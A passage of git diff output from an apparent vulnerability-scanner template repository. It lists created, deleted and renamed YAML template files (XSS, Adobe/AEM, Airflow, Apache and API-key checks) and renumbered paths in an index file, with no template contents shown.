delete mode 100644 poc/xss/oracle-oam-xss.yaml create mode 100644 poc/xss/oracle-siebel-xss.yaml delete mode 100644 poc/xss/parentlink-xss-9466.yaml create mode 100644 poc/xss/parentlink-xss.yaml create mode 100644 poc/xss/php-timeclock-xss-9550.yaml rename poc/xss/{php-timeclock-xss-9553.yaml => php-timeclock-xss.yaml} (100%) delete mode 100644 poc/xss/qcubed-xss-9749.yaml create mode 100644 poc/xss/qcubed-xss.yaml delete mode 100644 poc/xss/rails6-xss-9798.yaml delete mode 100644 poc/xss/rockmongo-xss-9902.yaml mode change 100644 => 100755 poc/xss/sassy-social-share-xss.yaml create mode 100644 poc/xss/sick-beard-xss-10234.yaml create mode 100644 poc/xss/squirrelmail-add-xss-10515.yaml delete mode 100644 poc/xss/squirrelmail-add-xss.yaml delete mode 100644 poc/xss/thruk-xss-10759.yaml create mode 100644 poc/xss/tikiwiki-reflected-xss-10780.yaml delete mode 100644 poc/xss/top-xss-params-10809.yaml rename poc/xss/{wems-manager-xss-11192.yaml => wems-manager-xss-11194.yaml} (100%) delete mode 100644 poc/xss/wems-manager-xss.yaml rename poc/xss/{wp-ambience-xss-11407.yaml => wp-ambience-xss-11408.yaml} (100%) create mode 100644 poc/xss/wp-church-admin-xss-11422.yaml delete mode 100644 poc/xss/wp-church-admin-xss-11423.yaml create mode 100644 poc/xss/wp-code-snippets-xss-11426.yaml delete mode 100644 poc/xss/wp-custom-tables-xss-11431.yaml create mode 100644 poc/xss/wp-custom-tables-xss-11434.yaml create mode 100644 poc/xss/wp-phpfreechat-xss-11525.yaml rename poc/xss/{wp-plugin-marmoset-viewer-xss-11538.yaml => wp-plugin-marmoset-viewer-xss-11537.yaml} (100%) delete mode 100644 poc/xss/wp-securimage-xss-11560.yaml delete mode 100644 poc/xss/wp-slideshow-xss-11575.yaml create mode 100644 poc/xss/wp-slideshow-xss-11576.yaml delete mode 100644 poc/xss/wp-socialfit-xss-11577.yaml create mode 100644 poc/xss/wpmudev-my-calender-xss-11503.yaml diff --git a/date.txt b/date.txt index 6bc0967a4f..345a13ee31 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240526 +20240527 diff --git a/poc.txt b/poc.txt index ad33f0f137..b2b36870a9 100644 --- a/poc.txt +++ b/poc.txt @@ -17,9 +17,9 @@ ./poc/adobe/adobe-coldfusion-detect-4.yaml ./poc/adobe/adobe-coldfusion-detect-5.yaml ./poc/adobe/adobe-coldfusion-detect-6.yaml -./poc/adobe/adobe-coldfusion-detect-82.yaml ./poc/adobe/adobe-coldfusion-detect-83.yaml ./poc/adobe/adobe-coldfusion-detect-84.yaml +./poc/adobe/adobe-coldfusion-detect.yaml ./poc/adobe/adobe-coldfusion-detector-1.yaml ./poc/adobe/adobe-coldfusion-detector-2.yaml ./poc/adobe/adobe-coldfusion-detector-3.yaml @@ -30,26 +30,25 @@ ./poc/adobe/adobe-coldfusion-error-detect-85.yaml ./poc/adobe/adobe-coldfusion-error-detect-86.yaml ./poc/adobe/adobe-coldfusion-error-detect-87.yaml -./poc/adobe/adobe-coldfusion-error-detect.yaml +./poc/adobe/adobe-coldfusion-error-detect-88.yaml ./poc/adobe/adobe-component-login-1.yaml ./poc/adobe/adobe-component-login-2.yaml -./poc/adobe/adobe-component-login-90.yaml +./poc/adobe/adobe-component-login-89.yaml ./poc/adobe/adobe-component-login-92.yaml ./poc/adobe/adobe-component-login.yaml ./poc/adobe/adobe-connect-central-login-93.yaml ./poc/adobe/adobe-connect-central-login-94.yaml -./poc/adobe/adobe-connect-central-login-95.yaml ./poc/adobe/adobe-connect-central-login-97.yaml ./poc/adobe/adobe-connect-central-login.yaml -./poc/adobe/adobe-connect-username-exposure-100.yaml -./poc/adobe/adobe-connect-username-exposure-101.yaml +./poc/adobe/adobe-connect-username-exposure-98.yaml ./poc/adobe/adobe-connect-username-exposure-99.yaml ./poc/adobe/adobe-connect-username-exposure.yaml +./poc/adobe/adobe-connect-version-102.yaml ./poc/adobe/adobe-connect-version-103.yaml -./poc/adobe/adobe-connect-version.yaml +./poc/adobe/adobe-connect-version-104.yaml ./poc/adobe/adobe-connect.yaml ./poc/adobe/adobe-cq5.yaml -./poc/adobe/adobe-experience-manager-login-106.yaml +./poc/adobe/adobe-experience-manager-login-105.yaml ./poc/adobe/adobe-experience-manager-login-107.yaml ./poc/adobe/adobe-experience-manager-login-108.yaml ./poc/adobe/adobe-experience-manager-login-109.yaml @@ -67,9 +66,8 @@ ./poc/adobe/adobe-robohelp.yaml ./poc/adobe/adobe-secret.yaml ./poc/adobe/aem-acs-common.yaml -./poc/adobe/aem-bg-servlet-127.yaml ./poc/adobe/aem-bg-servlet-128.yaml -./poc/adobe/aem-bg-servlet.yaml +./poc/adobe/aem-bg-servlet-129.yaml ./poc/adobe/aem-cached-pages-131.yaml ./poc/adobe/aem-cached-pages.yaml ./poc/adobe/aem-cms-finder.yaml @@ -85,8 +83,8 @@ ./poc/adobe/aem-default-get-servlet-11.yaml ./poc/adobe/aem-default-get-servlet-12.yaml ./poc/adobe/aem-default-get-servlet-13.yaml -./poc/adobe/aem-default-get-servlet-135.yaml ./poc/adobe/aem-default-get-servlet-136.yaml +./poc/adobe/aem-default-get-servlet-137.yaml ./poc/adobe/aem-default-get-servlet-139.yaml ./poc/adobe/aem-default-get-servlet-14.yaml ./poc/adobe/aem-default-get-servlet-15.yaml @@ -140,23 +138,24 @@ ./poc/adobe/aem-default-get-servlet-8.yaml ./poc/adobe/aem-default-get-servlet-9.yaml ./poc/adobe/aem-default-get-servlet.yaml +./poc/adobe/aem-default-login-140.yaml ./poc/adobe/aem-default-login-141.yaml ./poc/adobe/aem-default-login-142.yaml -./poc/adobe/aem-detaction.yaml ./poc/adobe/aem-detection-143.yaml -./poc/adobe/aem-detection-145.yaml +./poc/adobe/aem-detection-144.yaml ./poc/adobe/aem-detection-146.yaml ./poc/adobe/aem-detection.yaml ./poc/adobe/aem-disk-usage.yaml ./poc/adobe/aem-dump-contentnode.yaml ./poc/adobe/aem-explorer-nodetypes.yaml ./poc/adobe/aem-fuzz.yaml +./poc/adobe/aem-gql-servlet-147.yaml ./poc/adobe/aem-gql-servlet-148.yaml -./poc/adobe/aem-gql-servlet-149.yaml ./poc/adobe/aem-gql-servlet-150.yaml ./poc/adobe/aem-gql-servlet.yaml ./poc/adobe/aem-groovyconsole-151.yaml ./poc/adobe/aem-groovyconsole-152.yaml +./poc/adobe/aem-groovyconsole-153.yaml ./poc/adobe/aem-groovyconsole-154.yaml ./poc/adobe/aem-groovyconsole-155.yaml ./poc/adobe/aem-groovyconsole-156.yaml @@ -173,24 +172,25 @@ ./poc/adobe/aem-login-status-167.yaml ./poc/adobe/aem-login-status-168.yaml ./poc/adobe/aem-login-status-169.yaml -./poc/adobe/aem-login-status-171.yaml -./poc/adobe/aem-merge-metadata-servlet-172.yaml +./poc/adobe/aem-login-status-170.yaml +./poc/adobe/aem-login-status.yaml ./poc/adobe/aem-merge-metadata-servlet-173.yaml ./poc/adobe/aem-merge-metadata-servlet-174.yaml +./poc/adobe/aem-merge-metadata-servlet.yaml ./poc/adobe/aem-misc-admin.yaml ./poc/adobe/aem-offloading-browser.yaml ./poc/adobe/aem-osgi-bundles.yaml ./poc/adobe/aem-querybuilder-feed-servlet-176.yaml ./poc/adobe/aem-querybuilder-feed-servlet-177.yaml -./poc/adobe/aem-querybuilder-feed-servlet.yaml ./poc/adobe/aem-querybuilder-internal-path-read-1.yaml ./poc/adobe/aem-querybuilder-internal-path-read-178.yaml +./poc/adobe/aem-querybuilder-internal-path-read-179.yaml ./poc/adobe/aem-querybuilder-internal-path-read-180.yaml -./poc/adobe/aem-querybuilder-internal-path-read-181.yaml ./poc/adobe/aem-querybuilder-internal-path-read-2.yaml ./poc/adobe/aem-querybuilder-internal-path-read-3.yaml ./poc/adobe/aem-querybuilder-internal-path-read-4.yaml ./poc/adobe/aem-querybuilder-internal-path-read.yaml +./poc/adobe/aem-querybuilder-json-servlet-182.yaml ./poc/adobe/aem-querybuilder-json-servlet-183.yaml ./poc/adobe/aem-querybuilder-json-servlet-184.yaml ./poc/adobe/aem-querybuilder-json-servlet-185.yaml @@ -204,8 +204,8 @@ ./poc/adobe/aem-userinfo-servlet-191.yaml ./poc/adobe/aem-userinfo-servlet-193.yaml ./poc/adobe/aem-userinfo-servlet.yaml -./poc/adobe/aem-wcm-suggestions-servlet-194.yaml ./poc/adobe/aem-wcm-suggestions-servlet-195.yaml +./poc/adobe/aem-wcm-suggestions-servlet-196.yaml ./poc/adobe/aem-wcm-suggestions-servlet.yaml ./poc/adobe/aem-workflow.yaml ./poc/adobe/aem-xss-childlist-selector-197.yaml @@ -224,7 +224,7 @@ ./poc/airflow/Airflow-unauthorized.yaml ./poc/airflow/airflow-api-exposure.yaml ./poc/airflow/airflow-configuration-exposure-229.yaml -./poc/airflow/airflow-configuration-exposure-230.yaml +./poc/airflow/airflow-configuration-exposure.yaml ./poc/airflow/airflow-debug-232.yaml ./poc/airflow/airflow-debug-233.yaml ./poc/airflow/airflow-debug.yaml @@ -233,7 +233,8 @@ ./poc/airflow/airflow-default-login-236.yaml ./poc/airflow/airflow-detect-237.yaml ./poc/airflow/airflow-detect-238.yaml -./poc/airflow/airflow-detect-240.yaml +./poc/airflow/airflow-detect-239.yaml +./poc/airflow/airflow-detect.yaml ./poc/airflow/airflow-exposure.yaml ./poc/airflow/airflow-panel-243.yaml ./poc/airflow/airflow-panel-244.yaml @@ -243,6 +244,7 @@ ./poc/airflow/airflow-unauth.yml ./poc/airflow/airflow-workflow.yaml ./poc/airflow/apache-airflow.yaml +./poc/airflow/unauthenticated-airflow-10884.yaml ./poc/airflow/unauthenticated-airflow-10885.yaml ./poc/airflow/unauthenticated-airflow-10886.yaml ./poc/airflow/unauthenticated-airflow-10887.yaml @@ -269,7 +271,7 @@ ./poc/apache/apache-ambari.yaml ./poc/apache/apache-apisix-dashboard.yaml ./poc/apache/apache-apisix-panel-336.yaml -./poc/apache/apache-apisix-panel-337.yaml +./poc/apache/apache-apisix-panel-338.yaml ./poc/apache/apache-apisix-panel.yaml ./poc/apache/apache-apisix.yaml ./poc/apache/apache-archiva.yaml @@ -291,7 +293,6 @@ ./poc/apache/apache-detect-345.yaml ./poc/apache/apache-detect-346.yaml ./poc/apache/apache-detect-347.yaml -./poc/apache/apache-detect-348.yaml ./poc/apache/apache-detect-349.yaml ./poc/apache/apache-dir-listing.yaml ./poc/apache/apache-directory-exposure.yaml @@ -307,8 +308,9 @@ ./poc/apache/apache-dubbo.yaml ./poc/apache/apache-filename-brute-force-353.yaml ./poc/apache/apache-filename-brute-force.yaml -./poc/apache/apache-filename-enum.yaml +./poc/apache/apache-filename-enum-354.yaml ./poc/apache/apache-flink-unauth-rce-355.yaml +./poc/apache/apache-flink-unauth-rce-356.yaml ./poc/apache/apache-flink-unauth-rce-357.yaml ./poc/apache/apache-flink-unauth-rce-358.yaml ./poc/apache/apache-flink-unauth-rce-359.yaml @@ -316,7 +318,7 @@ ./poc/apache/apache-flink.yaml ./poc/apache/apache-forrest.yaml ./poc/apache/apache-guacamole-360.yaml -./poc/apache/apache-guacamole-361.yaml +./poc/apache/apache-guacamole.yaml ./poc/apache/apache-hadoop-yarn.yaml ./poc/apache/apache-hadoop.yaml ./poc/apache/apache-haus.yaml @@ -342,10 +344,11 @@ ./poc/apache/apache-mesos-panel.yaml ./poc/apache/apache-mesos.yaml ./poc/apache/apache-nifi-api-unauthorized-access.yml +./poc/apache/apache-nifi-rce.yaml ./poc/apache/apache-nifi.yaml ./poc/apache/apache-ofbiz-cve-2018-8033-xxe.yml ./poc/apache/apache-ofbiz-cve-2020-9496-xml-deserialization.yml -./poc/apache/apache-ofbiz-log4j-rce-366.yaml +./poc/apache/apache-ofbiz-log4j-rce.yaml ./poc/apache/apache-ofbiz.yaml ./poc/apache/apache-oozie-web-console.yaml ./poc/apache/apache-ranger.yaml @@ -361,7 +364,7 @@ ./poc/apache/apache-solr-file-read-369.yaml ./poc/apache/apache-solr-file-read-370.yaml ./poc/apache/apache-solr-log4j-CVE-2021-44228.yaml -./poc/apache/apache-solr-log4j-rce-372.yaml +./poc/apache/apache-solr-log4j-cve-2021-44228.yaml ./poc/apache/apache-solr-log4j-rce.yaml ./poc/apache/apache-solr-rce.yaml ./poc/apache/apache-solr-remotestreaming-anyfileread.yaml @@ -381,6 +384,7 @@ ./poc/apache/apache-tomcat-cve-2022-34305.yaml ./poc/apache/apache-tomcat-snoop-374.yaml ./poc/apache/apache-tomcat-snoop-376.yaml +./poc/apache/apache-tomcat-snoop-377.yaml ./poc/apache/apache-tomcat-snoop-cookie-handling.yaml ./poc/apache/apache-tomcat-snoop-ip-disclosure.yaml ./poc/apache/apache-tomcat-snoop.yaml @@ -393,12 +397,14 @@ ./poc/apache/askapache-firefox-adsense-f97340f5d88b3c5e1859d992075304c3.yaml ./poc/apache/askapache-firefox-adsense.yaml ./poc/apache/default-apache-test-all-6812.yaml +./poc/apache/default-apache-test-all-6813.yaml ./poc/apache/default-apache-test-all-6814.yaml -./poc/apache/default-apache-test-all-6815.yaml +./poc/apache/default-apache-test-all.yaml ./poc/apache/default-apache-test-page-6816.yaml ./poc/apache/default-apache-test-page-6817.yaml ./poc/apache/default-apache-test-page-6818.yaml ./poc/apache/default-apache-test-page-6819.yaml +./poc/apache/default-apache-test-page.yaml ./poc/apache/default-apache2-page-6804.yaml ./poc/apache/default-apache2-page-6805.yaml ./poc/apache/default-apache2-page-6806.yaml @@ -407,6 +413,7 @@ ./poc/apache/default-apache2-ubuntu-page-6809.yaml ./poc/apache/default-apache2-ubuntu-page-6810.yaml ./poc/apache/default-apache2-ubuntu-page-6811.yaml +./poc/apache/default-apache2-ubuntu-page.yaml ./poc/api/ApacheNifi-Api-UnauthorizedAccess.yaml ./poc/api/Discuz-info-api.yaml ./poc/api/Google-api.yaml @@ -436,22 +443,21 @@ ./poc/api/alfacgiapi-wordpress-4.yaml ./poc/api/apache-apisix-dashboard.yaml ./poc/api/apache-apisix-panel-336.yaml -./poc/api/apache-apisix-panel-337.yaml +./poc/api/apache-apisix-panel-338.yaml ./poc/api/apache-apisix-panel.yaml ./poc/api/apache-apisix.yaml ./poc/api/apache-nifi-api-unauthorized-access.yml ./poc/api/api-abstractapi-383.yaml ./poc/api/api-abstractapi.yaml +./poc/api/api-abuseipdb-384.yaml ./poc/api/api-abuseipdb-385.yaml -./poc/api/api-abuseipdb.yaml ./poc/api/api-accuweather-386.yaml -./poc/api/api-adafruit-io.yaml +./poc/api/api-adafruit-io-387.yaml ./poc/api/api-aletheia.yaml ./poc/api/api-alienvault-388.yaml -./poc/api/api-alienvault-390.yaml -./poc/api/api-alienvault.yaml -./poc/api/api-apigee-edge.yaml -./poc/api/api-appveyor.yaml +./poc/api/api-alienvault-389.yaml +./poc/api/api-apigee-edge-391.yaml +./poc/api/api-appveyor-392.yaml ./poc/api/api-asana-393.yaml ./poc/api/api-aviationstack.yaml ./poc/api/api-bearer-auth-a2f3021256bf5d76bbaeaff6f05d43fd.yaml @@ -459,60 +465,58 @@ ./poc/api/api-bible-394.yaml ./poc/api/api-bing-map-2018-bdd86a2dc395718687e612b89b6cd720.yaml ./poc/api/api-bing-map-2018.yaml -./poc/api/api-bingmaps-395.yaml ./poc/api/api-bingmaps.yaml ./poc/api/api-bitly-396.yaml +./poc/api/api-bitly.yaml ./poc/api/api-bitrise.yaml ./poc/api/api-block-400.yaml +./poc/api/api-blockchain-398.yaml ./poc/api/api-blockchain-399.yaml -./poc/api/api-blockchain.yaml ./poc/api/api-bravenewcoin.yaml ./poc/api/api-breezometer.yaml -./poc/api/api-buildkite.yaml +./poc/api/api-buildkite-402.yaml ./poc/api/api-buttercms-403.yaml +./poc/api/api-buttercms.yaml ./poc/api/api-calendly-404.yaml -./poc/api/api-calendly.yaml ./poc/api/api-carboninterface.yaml ./poc/api/api-circleci-405.yaml -./poc/api/api-circleci-406.yaml -./poc/api/api-clearbit-407.yaml +./poc/api/api-circleci.yaml +./poc/api/api-clearbit.yaml ./poc/api/api-climatiq.yaml ./poc/api/api-cloudmersive.yaml ./poc/api/api-coinapi-408.yaml ./poc/api/api-cooperhewitt-410.yaml ./poc/api/api-cooperhewitt-411.yaml -./poc/api/api-covalent.yaml +./poc/api/api-covalent-412.yaml ./poc/api/api-dbt.yaml -./poc/api/api-debounce.yaml +./poc/api/api-debounce-414.yaml ./poc/api/api-deviantart.yaml ./poc/api/api-dribbble-416.yaml -./poc/api/api-dribbble.yaml +./poc/api/api-dribbble-417.yaml ./poc/api/api-dropbox-418.yaml -./poc/api/api-dropbox.yaml ./poc/api/api-endpoints.yaml ./poc/api/api-europeana-419.yaml ./poc/api/api-europeana-420.yaml -./poc/api/api-europeana-421.yaml ./poc/api/api-facebook-422.yaml +./poc/api/api-fastly-424.yaml ./poc/api/api-fastly.yaml -./poc/api/api-fastly.yml ./poc/api/api-festivo.yaml ./poc/api/api-fixer.yaml -./poc/api/api-fontawesome.yaml +./poc/api/api-fontawesome-426.yaml ./poc/api/api-fortitoken-cloud.yaml ./poc/api/api-front.yaml -./poc/api/api-fullhunt-428.yaml +./poc/api/api-fullhunt.yaml ./poc/api/api-github-429.yaml ./poc/api/api-gitlab-431.yaml -./poc/api/api-gitlab.yaml +./poc/api/api-gitlab.yml ./poc/api/api-google-drive-432.yaml ./poc/api/api-harvardart-433.yaml ./poc/api/api-harvardart-434.yaml ./poc/api/api-heroku-435.yaml -./poc/api/api-hirak-rates.yaml +./poc/api/api-hirak-rates-436.yaml ./poc/api/api-hubspot-437.yaml ./poc/api/api-iconfinder-438.yaml -./poc/api/api-iconfinder-439.yaml +./poc/api/api-iconfinder.yaml ./poc/api/api-improvmx.yaml ./poc/api/api-info-themes-plugins-wp-org-66caa0b56de1f5b395ccb9edd74d127d.yaml ./poc/api/api-info-themes-plugins-wp-org-a5ba91db466ae424f41944b08096d121.yaml @@ -522,89 +526,94 @@ ./poc/api/api-info-themes-plugins-wp-org-plugin.yaml ./poc/api/api-info-themes-plugins-wp-org.yaml ./poc/api/api-instagram.yaml -./poc/api/api-instatus-442.yaml -./poc/api/api-intercom.yaml +./poc/api/api-instatus.yaml +./poc/api/api-intercom-443.yaml ./poc/api/api-ipapi.yaml -./poc/api/api-ipstack-444.yaml ./poc/api/api-ipstack.yaml ./poc/api/api-iqair.yaml +./poc/api/api-iterable-445.yaml ./poc/api/api-iterable.yaml -./poc/api/api-jumpcloud-446.yaml +./poc/api/api-jumpcloud.yaml ./poc/api/api-key-for-google-maps-b973f74f4310543c7180ee3869335562.yaml ./poc/api/api-key-for-google-maps.yaml ./poc/api/api-keys.yaml ./poc/api/api-languagelayer.yaml -./poc/api/api-launchdarkly.yaml +./poc/api/api-launchdarkly-449.yaml ./poc/api/api-leanix-450.yaml ./poc/api/api-linkedin.yaml ./poc/api/api-linkfinder.yaml ./poc/api/api-lokalise-452.yaml -./poc/api/api-loqate-453.yaml +./poc/api/api-loqate.yaml ./poc/api/api-mailchimp-454.yaml ./poc/api/api-mailgun-455.yaml ./poc/api/api-malshare-456.yaml +./poc/api/api-malshare-457.yaml ./poc/api/api-malwarebazaar-459.yaml +./poc/api/api-malwarebazaar.yaml ./poc/api/api-mapbox-465.yaml +./poc/api/api-mapbox.yaml ./poc/api/api-marketstack.yaml ./poc/api/api-mediastack.yaml ./poc/api/api-mojoauth.yaml +./poc/api/api-mywot-467.yaml ./poc/api/api-mywot-468.yaml -./poc/api/api-mywot.yaml ./poc/api/api-nerdgraph-469.yaml ./poc/api/api-netlify.yaml ./poc/api/api-npm-471.yaml -./poc/api/api-npm.yaml -./poc/api/api-onelogin-472.yaml -./poc/api/api-openweather-473.yaml +./poc/api/api-onelogin.yaml +./poc/api/api-openweather.yaml ./poc/api/api-optimizely.yaml ./poc/api/api-pagerduty-475.yaml ./poc/api/api-particle-476.yaml -./poc/api/api-pastebin-477.yaml +./poc/api/api-pastebin.yaml ./poc/api/api-paypal.yaml ./poc/api/api-pendo-479.yaml -./poc/api/api-petfinder-480.yaml -./poc/api/api-pinata.yaml +./poc/api/api-petfinder.yaml +./poc/api/api-pinata-481.yaml ./poc/api/api-pivotaltracker-482.yaml +./poc/api/api-pivotaltracker.yaml ./poc/api/api-positionstack.yaml ./poc/api/api-postmark-483.yaml -./poc/api/api-quip-484.yaml +./poc/api/api-quip.yaml ./poc/api/api-rate-limit-exceeded.yaml ./poc/api/api-reviewapi.yaml ./poc/api/api-rijksmuseum-485.yaml -./poc/api/api-scanii-487.yaml +./poc/api/api-scanii-488.yaml +./poc/api/api-scanii.yaml ./poc/api/api-screenshotlayer.yaml ./poc/api/api-seatgeek.yaml ./poc/api/api-sendgrid-489.yaml ./poc/api/api-slack-493.yaml ./poc/api/api-sonarcloud-494.yaml ./poc/api/api-sportdataapi.yaml -./poc/api/api-spotify-495.yaml +./poc/api/api-spotify.yaml ./poc/api/api-square-496.yaml +./poc/api/api-square.yaml ./poc/api/api-sslmate.yaml ./poc/api/api-strava.yaml ./poc/api/api-stripe-499.yaml -./poc/api/api-stytch-500.yaml +./poc/api/api-stripe.yaml +./poc/api/api-stytch.yaml ./poc/api/api-taiga.yaml ./poc/api/api-thecatapi-502.yaml ./poc/api/api-thecatapi.yaml -./poc/api/api-tink.yaml +./poc/api/api-tink-504.yaml ./poc/api/api-tinypng-505.yaml ./poc/api/api-travisci-506.yaml -./poc/api/api-travisci.yaml -./poc/api/api-twitter-507.yaml +./poc/api/api-twitter.yaml ./poc/api/api-urlscan-508.yaml +./poc/api/api-urlscan-509.yaml ./poc/api/api-users-exposed.yaml ./poc/api/api-vercel.yaml -./poc/api/api-virustotal-511.yaml ./poc/api/api-virustotal-512.yaml -./poc/api/api-visualstudio.yaml -./poc/api/api-wakatime-514.yaml +./poc/api/api-virustotal.yaml +./poc/api/api-visualstudio-513.yaml +./poc/api/api-wakatime.yaml ./poc/api/api-weatherstack.yaml ./poc/api/api-webex.yaml ./poc/api/api-weglot-516.yaml -./poc/api/api-wordcloud-517.yaml ./poc/api/api-wordcloud-518.yaml -./poc/api/api-youtube-519.yaml +./poc/api/api-youtube.yaml ./poc/api/api-zenserp.yaml ./poc/api/api-zipcodebase.yaml ./poc/api/api2cart-bridge-connector-7f28d21ce1d1423f08ff3303e97fdcda.yaml @@ -616,12 +625,15 @@ ./poc/api/apilayer-caddy.yaml ./poc/api/apiman-panel-460.yaml ./poc/api/apiman-panel-461.yaml +./poc/api/apiman-panel-462.yaml ./poc/api/apiman-panel-463.yaml +./poc/api/apiman-panel-464.yaml ./poc/api/apisix-default-login-490.yaml +./poc/api/apisix-default-login-491.yaml ./poc/api/apisix-default-login-492.yaml ./poc/api/apisix-panel.yaml ./poc/api/apisix-workflow.yaml -./poc/api/arcgis-rest-api-532.yaml +./poc/api/arcgis-rest-api-533.yaml ./poc/api/arcgis-rest-api.yaml ./poc/api/artifactory-api-password-550.yaml ./poc/api/artifactory-api-password.yaml @@ -629,14 +641,15 @@ ./poc/api/axway-api-manager-panel.yaml ./poc/api/azure-apim-secret-key-disclosure.yaml ./poc/api/beamer-api-token.yaml +./poc/api/bems-api-lfi-707.yaml ./poc/api/bems-api-lfi-708.yaml ./poc/api/bems-api-lfi-709.yaml ./poc/api/bems-api-lfi-710.yaml -./poc/api/bems-api-lfi-711.yaml +./poc/api/bems-api-lfi-712.yaml ./poc/api/burp-api-detect-809.yaml +./poc/api/burp-api-detect-810.yaml ./poc/api/burp-api-detect-812.yaml ./poc/api/burp-api-detect-813.yaml -./poc/api/burp-api-detect.yaml ./poc/api/cart-rest-api-for-woocommerce-863e46252f4619353ac6e316726d18cc.yaml ./poc/api/cart-rest-api-for-woocommerce.yaml ./poc/api/clickhouse-api-unauth.yaml @@ -649,7 +662,8 @@ ./poc/api/contentful-api-token.yaml ./poc/api/couchbase-buckets-api-1230.yaml ./poc/api/couchbase-buckets-api-1231.yaml -./poc/api/couchbase-buckets-api.yaml +./poc/api/couchbase-buckets-api-1232.yaml +./poc/api/couchbase-buckets-api-1233.yaml ./poc/api/couchbase-buckets-rest-api.yaml ./poc/api/cpanel-api-codes.yaml ./poc/api/cratesio-api-key.yaml @@ -692,8 +706,6 @@ ./poc/api/exposed-docker-api-7299.yaml ./poc/api/exposed-docker-api-7301.yaml ./poc/api/exposed-glances-api-7307.yaml -./poc/api/exposed-glances-api-7308.yaml -./poc/api/exposed-glances-api-7309.yaml ./poc/api/exposed-glances-api-7310.yaml ./poc/api/facebook-api-token.yaml ./poc/api/facebook-page-feed-graph-api-124428fc6a79b3aa2b4be454d33a013a.yaml @@ -709,7 +721,6 @@ ./poc/api/fastapi-3.yaml ./poc/api/fastapi-4.yaml ./poc/api/fastapi-5.yaml -./poc/api/fastapi-docs-7398.yaml ./poc/api/fastapi-docs.yaml ./poc/api/fastly-api-token.yaml ./poc/api/fcm-api-key.yaml @@ -723,6 +734,7 @@ ./poc/api/forms-to-zapier-plugin.yaml ./poc/api/forms-to-zapier.yaml ./poc/api/gitlab-api-user-enum-7667.yaml +./poc/api/gitlab-api-user-enum-7668.yaml ./poc/api/gitlab-api-user-enum-7669.yaml ./poc/api/gitlab-api-user-enum.yaml ./poc/api/gitlab-user-open-api-7702.yaml @@ -731,7 +743,6 @@ ./poc/api/gmail-api-client-secrets-7740.yaml ./poc/api/gmail-api-client-secrets.yaml ./poc/api/goSwaggerAPI.yaml -./poc/api/google-api-7771.yaml ./poc/api/google-api-7772.yaml ./poc/api/google-api-key-7767.yaml ./poc/api/google-api-key-7768.yaml @@ -748,8 +759,8 @@ ./poc/api/graylog-api-browser-7848.yaml ./poc/api/hidden-api-endpoint-discovery.yaml ./poc/api/hidden-api-key-exposure.yaml -./poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml ./poc/api/http-etcd-unauthenticated-api-data-leak-8057.yaml +./poc/api/http-etcd-unauthenticated-api-data-leak.yaml ./poc/api/iis-enum-httpapi.yaml ./poc/api/jenkins-api-panel-8261.yaml ./poc/api/jenkins-api-panel-8262.yaml @@ -771,6 +782,7 @@ ./poc/api/k8s-apiserver-unauthorized.yaml ./poc/api/kube-api-deployments-8503.yaml ./poc/api/kube-api-deployments-8504.yaml +./poc/api/kube-api-deployments.yaml ./poc/api/kube-api-namespaces-8505.yaml ./poc/api/kube-api-namespaces-8506.yaml ./poc/api/kube-api-nodes-8507.yaml @@ -782,7 +794,7 @@ ./poc/api/kube-api-secrets-8511.yaml ./poc/api/kube-api-secrets-8512.yaml ./poc/api/kube-api-services-8513.yaml -./poc/api/kube-api-services.yaml +./poc/api/kube-api-services-8514.yaml ./poc/api/kubernetes-api-detect.yaml ./poc/api/kubernetes-pods-api.yaml ./poc/api/loqate-api-key.yaml @@ -792,7 +804,7 @@ ./poc/api/magento-2-exposed-api-8687.yaml ./poc/api/magento-2-exposed-api-8688.yaml ./poc/api/magento-2-exposed-api-8689.yaml -./poc/api/mailchimp-api-11854.yaml +./poc/api/mailchimp-api(1).yaml ./poc/api/mailchimp-api-key-8722.yaml ./poc/api/mailchimp-api-key-8723.yaml ./poc/api/mailchimp-api-key-8724.yaml @@ -872,14 +884,15 @@ ./poc/api/sema-api-b9fc11c70eceb7a7923754c656c28f17.yaml ./poc/api/sema-api.yaml ./poc/api/sendgrid-api-11859.yaml -./poc/api/sendgrid-api-key-10140.yaml ./poc/api/sendgrid-api-key-10141.yaml +./poc/api/sendgrid-api-key-10142.yaml +./poc/api/sendgrid-api-key.yaml ./poc/api/sendgrid-api.yaml ./poc/api/shiziyu-ApigoodsController-sqlinjection.yaml ./poc/api/shiziyu-CMS-ApigoodController.class.php-SQL.yaml ./poc/api/shiziyu-apicontroller-sqlinjection.yaml ./poc/api/shiziyu-cms-apicontroller-sqli.yml -./poc/api/slack-api-11864.yaml +./poc/api/slack-api(1).yaml ./poc/api/slack-api-token.yaml ./poc/api/slack-api.yaml ./poc/api/spark-api-unauth.yaml @@ -893,25 +906,25 @@ ./poc/api/strapi-cms-detect-10539.yaml ./poc/api/strapi-cms-detect-10540.yaml ./poc/api/strapi-cms-detect-10541.yaml -./poc/api/strapi-cms-detect.yaml ./poc/api/strapi-documentation-10542.yaml ./poc/api/strapi-documentation-10543.yaml ./poc/api/strapi-documentation.yaml ./poc/api/strapi-page-1.yaml -./poc/api/strapi-page-10544.yaml ./poc/api/strapi-page-10545.yaml +./poc/api/strapi-page-10546.yaml ./poc/api/strapi-page-10547.yaml ./poc/api/strapi-page-2.yaml +./poc/api/strapi-page.yaml ./poc/api/strapi-panel-10548.yaml ./poc/api/strapi-panel.yaml -./poc/api/stripe-api-key(1).yaml +./poc/api/stripe-api-key-11869.yaml ./poc/api/stripe-api-key.yaml ./poc/api/swagger-api-1.yaml ./poc/api/swagger-api-10.yaml ./poc/api/swagger-api-10591.yaml ./poc/api/swagger-api-10592.yaml ./poc/api/swagger-api-10593.yaml -./poc/api/swagger-api-10595.yaml +./poc/api/swagger-api-10594.yaml ./poc/api/swagger-api-11.yaml ./poc/api/swagger-api-12.yaml ./poc/api/swagger-api-13.yaml @@ -987,7 +1000,7 @@ ./poc/api/swagger-api.yaml ./poc/api/tongda-api-ali-fileupload.yaml ./poc/api/tongda-oa-api-ali-upload.yaml -./poc/api/twilio-api-10860.yaml +./poc/api/twilio-api-10861.yaml ./poc/api/twilio-api.yaml ./poc/api/unauth-spark-api-10961.yaml ./poc/api/unauth-spark-api-10962.yaml @@ -1014,7 +1027,6 @@ ./poc/api/wadl-api-1.yaml ./poc/api/wadl-api-11082.yaml ./poc/api/wadl-api-11083.yaml -./poc/api/wadl-api-11084.yaml ./poc/api/wadl-api-11085.yaml ./poc/api/wadl-api-2.yaml ./poc/api/wadl-api-3.yaml 